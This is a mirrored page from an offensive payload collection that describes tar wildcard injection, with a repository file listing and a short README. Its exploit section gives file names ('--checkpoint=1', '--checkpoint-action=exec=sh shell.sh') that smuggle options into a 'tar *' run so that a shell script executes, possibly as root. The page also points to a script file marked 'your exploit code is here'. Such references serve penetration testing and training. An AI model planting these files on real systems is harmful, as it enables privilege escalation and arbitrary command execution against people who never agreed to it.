1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-18 16:36:12 +02:00
PayloadsAllTheThings/Tar commands execution
Swissky 65654f81a4 Markdown formatting update 2018-08-12 23:30:22 +02:00
..
--checkpoint-action=exec=sh shell.sh Clean project - Renamed and added PHP juggling type 2016-10-20 10:22:24 +07:00
--checkpoint=1 Clean project - Renamed and added PHP juggling type 2016-10-20 10:22:24 +07:00
README.md Markdown formatting update 2018-08-12 23:30:22 +02:00
shell.sh Clean project - Renamed and added PHP juggling type 2016-10-20 10:22:24 +07:00

TAR Command Execution

By using tar with checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and thats where the wildcard comes in handy.

Exploit

These files work against a "tar *"

--checkpoint=1
--checkpoint-action=exec=sh shell.sh
shell.sh   (your exploit code is here)

Thanks to